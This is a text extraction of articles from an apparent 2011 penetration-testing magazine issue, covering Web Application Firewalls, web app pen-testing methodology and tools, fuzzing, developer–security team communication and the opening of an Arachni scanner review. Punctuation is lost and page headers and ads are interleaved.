Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
